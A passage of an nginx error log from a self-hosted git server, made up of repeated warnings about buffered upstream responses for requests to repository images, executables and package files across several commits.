/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" -2026/02/17 13:57:13 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/14/0000014144 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png" -2026/02/17 13:57:20 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/14/0000014145 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom6.png" -2026/02/17 13:57:28 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/14/0000014146 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png" -2026/02/17 13:57:36 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/14/0000014147 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png" -2026/02/17 13:57:45 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/14/0000014148 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png" -2026/02/17 13:57:54 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/14/0000014149 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png" -2026/02/17 13:57:56 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/15/0000014150 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png" -2026/02/17 13:57:57 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/15/0000014151 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png" -2026/02/17 13:58:09 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/15/0000014152 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png" -2026/02/17 13:58:37 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/15/0000014153 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist/PostgresWatchdog.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist/PostgresWatchdog.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist/PostgresWatchdog.exe" -2026/02/17 13:58:40 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/15/0000014154 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -2026/02/17 13:59:52 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/15/0000014155 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.exe" -2026/02/17 13:59:59 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/15/0000014156 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.exe" -2026/02/17 14:00:27 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/15/0000014157 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/GoldMonitor.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/GoldMonitor.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/GoldMonitor.exe" -2026/02/17 14:00:36 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/15/0000014158 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/AssetPilot.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/AssetPilot.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/AssetPilot.pkg" -2026/02/17 14:00:44 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/15/0000014159 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/GoldMonitor.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/GoldMonitor.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" -2026/02/17 14:00:58 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/16/0000014160 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/AssetPilot.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/AssetPilot.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/AssetPilot.exe" -2026/02/17 14:01:41 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/16/0000014161 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.exe" -2026/02/17 14:01:50 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/16/0000014162 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.exe" -2026/02/17 14:02:23 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/16/0000014163 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/GoldMonitor.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/GoldMonitor.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/GoldMonitor.exe" -2026/02/17 14:02:34 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/16/0000014164 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/GoldMonitor.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/GoldMonitor.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" -2026/02/17 14:02:41 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/16/0000014165 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/AssetPilot.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/AssetPilot.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/AssetPilot.pkg" -2026/02/17 14:02:48 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/16/0000014166 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/AssetPilot.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/AssetPilot.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/AssetPilot.exe" -2026/02/17 14:03:53 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/16/0000014167 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png" -2026/02/17 14:04:46 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/16/0000014168 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html" -2026/02/17 14:04:55 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/16/0000014169 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png" -2026/02/17 14:05:02 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/17/0000014170 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png" -2026/02/17 14:05:10 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/17/0000014171 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png" -2026/02/17 14:05:18 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/17/0000014172 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png" -2026/02/17 14:05:20 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/17/0000014173 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png" -2026/02/17 14:05:26 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/17/0000014174 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png" -2026/02/17 14:05:32 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/17/0000014175 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png" -2026/02/17 14:05:50 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/17/0000014176 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom7.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" -2026/02/17 14:05:52 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/17/0000014177 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" -2026/02/17 14:06:01 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/17/0000014178 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom7.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom7.png" -2026/02/17 14:06:08 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/17/0000014179 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom4.png" -2026/02/17 14:06:15 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/18/0000014180 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom5.png" -2026/02/17 14:06:22 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/18/0000014181 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom6.png" -2026/02/17 14:06:30 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/18/0000014182 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom3.png" -2026/02/17 14:06:37 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/18/0000014183 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom1.png" -2026/02/17 14:06:45 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/18/0000014184 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png" -2026/02/17 14:06:48 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/18/0000014185 while reading upstream, client: 74.7.227.38, server: 